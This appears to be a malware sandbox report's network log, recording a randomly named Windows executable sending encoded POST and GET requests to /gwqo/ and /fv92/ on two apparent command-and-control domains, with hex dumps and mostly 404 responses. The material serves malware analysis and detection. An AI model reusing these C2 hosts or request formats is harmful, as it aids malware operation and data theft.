                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                      Jun 10, 2024 10:22:44.669744968 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                      Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.551396103.138.88.32802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:46.195141077 CEST740OUTPOST /gwqo/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.skyinftech.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.skyinftech.com
                                      Referer: http://www.skyinftech.com/gwqo/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 6c 6d 76 39 74 66 31 6a 43 58 51 47 6a 65 6c 72 51 31 52 5a 56 6c 57 78 46 43 6b 57 6b 48 76 6d 48 63 45 68 56 6b 47 72 63 59 38 62 6f 33 2b 61 2f 74 31 57 67 73 7a 67 41 51 30 41 58 71 6b 37 69 4a 43 5a 31 2f 5a 41 46 62 4c 4d 2f 45 6d 79 54 63 70 62 75 54 53 34 56 57 50 36 6f 47 37 6a 52 4d 53 76 49 2f 71 38 30 2b 7a 55 56 64 74 49 72 69 54 6b 6e 42 2b 7a 64 4d 6d 34 41 63 65 58 34 78 49 39 6f 36 5a 54 6b 48 74 41 35 32 55 6b 52 68 34 59 31 35 6c 38 66 75 52 34 33 74 33 32 41 61 4b 78 35 65 67 7a 6a 64 37 66 38 41 6d 66 4d 68 61 6e 39 47 49 6b 46 48 5a 7a 48 50 51 68 35 39 6c 58 55 5a 4e 47 44 4c 77 48 66 34 49 67 7a 62 48 76 6c 39 78 59 55 69 4c 49
                                      Data Ascii: TTv82Lg=lmv9tf1jCXQGjelrQ1RZVlWxFCkWkHvmHcEhVkGrcY8bo3+a/t1WgszgAQ0AXqk7iJCZ1/ZAFbLM/EmyTcpbuTS4VWP6oG7jRMSvI/q80+zUVdtIriTknB+zdMm4AceX4xI9o6ZTkHtA52UkRh4Y15l8fuR43t32AaKx5egzjd7f8AmfMhan9GIkFHZzHPQh59lXUZNGDLwHf4IgzbHvl9xYUiLI
                                      Jun 10, 2024 10:22:47.210644007 CEST1236INHTTP/1.1 404 Not Found
                                      Connection: close
                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                      pragma: no-cache
                                      content-type: text/html
                                      content-length: 1238
                                      date: Mon, 10 Jun 2024 08:22:45 GMT
                                      server: LiteSpeed
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                      Jun 10, 2024 10:22:47.210664034 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                      Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.551397103.138.88.32802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:48.726429939 CEST1757OUTPOST /gwqo/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.skyinftech.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.skyinftech.com
                                      Referer: http://www.skyinftech.com/gwqo/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 6c 6d 76 39 74 66 31 6a 43 58 51 47 6a 65 6c 72 51 31 52 5a 56 6c 57 78 46 43 6b 57 6b 48 76 6d 48 63 45 68 56 6b 47 72 63 59 30 62 70 45 47 61 2b 4d 31 57 68 73 7a 67 44 51 30 42 58 71 6b 63 69 4e 57 56 31 2f 56 51 46 5a 7a 4d 35 57 75 79 61 4e 70 62 35 44 53 34 5a 32 50 35 73 47 37 79 52 4d 44 6f 49 2f 36 38 30 2b 7a 55 56 65 31 49 73 7a 54 6b 33 78 2b 30 58 73 6d 4f 58 4d 65 7a 34 78 51 48 6f 36 63 75 6b 33 4e 41 34 57 45 6b 54 79 41 59 6f 4a 6c 2b 65 75 51 72 33 74 7a 54 41 65 72 64 35 65 46 6b 6a 66 62 66 2b 33 6a 62 49 56 4f 74 67 55 30 56 44 31 41 58 66 34 51 59 78 38 78 66 55 34 78 58 41 4a 59 78 58 63 77 65 79 49 33 71 78 70 64 65 54 53 36 68 32 77 46 6e 75 6c 71 78 6c 54 2b 42 45 58 31 69 56 6f 79 63 51 4c 44 4b 41 72 71 30 33 44 52 30 62 31 4d 79 73 62 75 69 41 4f 45 38 2b 45 5a 67 70 58 72 48 47 70 4f 72 76 43 41 4c 37 6b 73 39 79 62 48 2f 30 42 63 74 4d 37 67 34 41 61 34 6d 38 6c 37 70 6f 4b 63 39 52 41 79 63 59 50 43 6a 73 53 6f 52 6f 52 69 74 39 65 4c 51 66 79 [TRUNCATED]
                                      Data Ascii: TTv82Lg=lmv9tf1jCXQGjelrQ1RZVlWxFCkWkHvmHcEhVkGrcY0bpEGa+M1WhszgDQ0BXqkciNWV1/VQFZzM5WuyaNpb5DS4Z2P5sG7yRMDoI/680+zUVe1IszTk3x+0XsmOXMez4xQHo6cuk3NA4WEkTyAYoJl+euQr3tzTAerd5eFkjfbf+3jbIVOtgU0VD1AXf4QYx8xfU4xXAJYxXcweyI3qxpdeTS6h2wFnulqxlT+BEX1iVoycQLDKArq03DR0b1MysbuiAOE8+EZgpXrHGpOrvCAL7ks9ybH/0BctM7g4Aa4m8l7poKc9RAycYPCjsSoRoRit9eLQfyrip09BLFO8fCHL25V3eksn8w5zB8UAxd3kyQIPJlEG5iF1q3nDFwFK0l/juPxP/jsOHw9vq8Q48EzsOZ6Ruv1xtzcCJmsrFICsL4onIWZtN2+FoQWTdaVtxZvdXsJfmcN31ozmRo2GFKbnjwApBFWQXHq41KGRmpFUWO26i1NUbyRvOyzBMyS9K4EGeH++F44TaJ2Tmp453RPcFryj20Aiy4FjMW6yGcS4F2okblX+j7uwWQDEhG0054ku6OEzDNOWFS5gJv/bfNwfDv2CAaNVwKbvrQYXQsVZwLt21IPQX5C7bbPAt//OjT4thJ6ERup0CYs8iRg3vDsQDUnjNEdJFchT9Z9M/uSI2oJT//xp/b3oK/IurCJy9ttZdqtZYh530MlhPF7A9Zp+aIiNy21YC3P8bfHn4gXcGWdoUrHC0hmlmMagZduCAIVEKjEL2QsnBpp77UMQY+oTp5TVjcJauIWjK+ojMk2IoF1p7oAzltND4iMX5nf3vdv6p0RArhVG9GpyE38MUqoGMmEqw2zQ6XbBpS+GlIhmS6mHMIXzNEmMG5pp2IzlwrITGJXSBzA5LG8YTsXcNHWfFxCbb+Q7+cNIawWkI9lvtNOEBywdp+x7t9DIi2s16g4JzCv50O9jiaEGcpT2LWvaEwYfki5gEU3zhhtxUrK7 [TRUNCATED]
                                      Jun 10, 2024 10:22:49.729759932 CEST1236INHTTP/1.1 404 Not Found
                                      Connection: close
                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                      pragma: no-cache
                                      content-type: text/html
                                      content-length: 1238
                                      date: Mon, 10 Jun 2024 08:22:47 GMT
                                      server: LiteSpeed
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                      Jun 10, 2024 10:22:49.729780912 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                      Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.551398103.138.88.32802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:51.257191896 CEST457OUTGET /gwqo/?kH=00U8ENLHk&TTv82Lg=okHduu9bAgMM6c4GdEVgS1G+EVcXjBymZ/AEM3aFVKlZzziUwfhKvtqGWgkRboMd4eWK0/sAAMCd+0rGXOBNsjDOL2SA50vrXr2QK+Wy7YL6dLNwijbZiWqDBeKnevfe7g== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.skyinftech.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:22:52.257174015 CEST1236INHTTP/1.1 404 Not Found
                                      Connection: close
                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                      pragma: no-cache
                                      content-type: text/html
                                      content-length: 1238
                                      date: Mon, 10 Jun 2024 08:22:50 GMT
                                      server: LiteSpeed
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                      Jun 10, 2024 10:22:52.257200956 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                      Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.551399162.0.213.72802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:57.906155109 CEST711OUTPOST /fv92/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.chowzen.top
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.chowzen.top
                                      Referer: http://www.chowzen.top/fv92/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 2f 4b 54 4f 63 49 52 78 33 35 38 53 32 55 30 5a 72 48 44 30 74 57 6b 32 36 2b 79 36 67 7a 37 54 6f 6a 56 55 30 58 4c 67 36 39 51 64 67 6a 4d 6f 78 6b 71 49 54 38 32 4f 78 4d 66 6d 4b 50 4e 34 69 38 39 6f 6c 5a 74 71 72 4f 6e 51 6b 67 30 54 59 59 79 31 73 31 7a 35 32 2b 5a 48 54 45 43 74 6a 33 61 42 64 58 4a 61 31 2b 34 32 32 54 68 36 63 4a 61 77 30 45 32 45 6b 4d 51 34 69 43 2b 73 46 7a 47 4f 57 4f 70 42 6e 45 37 4a 4f 69 5a 57 69 71 75 32 6c 4c 42 55 6a 67 42 45 4f 68 47 6f 4a 49 58 2f 41 6a 66 70 52 6a 65 79 41 42 49 58 37 4a 46 68 4d 70 4d 52 45 6f 33 42 2b 6f 31 78 71 4b 73 72 42 46 51 3d
                                      Data Ascii: TTv82Lg=/KTOcIRx358S2U0ZrHD0tWk26+y6gz7TojVU0XLg69QdgjMoxkqIT82OxMfmKPN4i89olZtqrOnQkg0TYYy1s1z52+ZHTECtj3aBdXJa1+422Th6cJaw0E2EkMQ4iC+sFzGOWOpBnE7JOiZWiqu2lLBUjgBEOhGoJIX/AjfpRjeyABIX7JFhMpMREo3B+o1xqKsrBFQ=
                                      Jun 10, 2024 10:22:58.575686932 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 10 Jun 2024 08:22:58 GMT
                                      Server: Apache
                                      Content-Length: 16026
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                      Jun 10, 2024 10:22:58.575712919 CEST212INData Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37
                                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461
                                      Jun 10, 2024 10:22:58.575855970 CEST1236INData Raw: 2c 34 2e 36 36 38 2c 32 2e 37 30 35 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63
                                      Data Ascii: ,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet">
                                      Jun 10, 2024 10:22:58.575872898 CEST1236INData Raw: 2e 30 36 39 2c 30 2c 36 38 2e 39 37 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e 0a 20 20
                                      Data Ascii: .069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit
                                      Jun 10, 2024 10:22:58.575889111 CEST1236INData Raw: 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39 34 22 20
                                      Data Ascii: 3" stroke-linecap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-
                                      Jun 10, 2024 10:22:58.575905085 CEST636INData Raw: 22 20 79 32 3d 22 33 30 38 2e 31 32 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64
                                      Data Ascii: " y2="308.124" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g>
                                      Jun 10, 2024 10:22:58.575918913 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65
                                      Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" />
                                      Jun 10, 2024 10:22:58.575933933 CEST212INData Raw: 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20
                                      Data Ascii: .146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-mi
                                      Jun 10, 2024 10:22:58.575947046 CEST1236INData Raw: 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 35 38 38 2e 39 37 37 22 20 63 79 3d 22 32 35 35 2e 39 37 38 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20
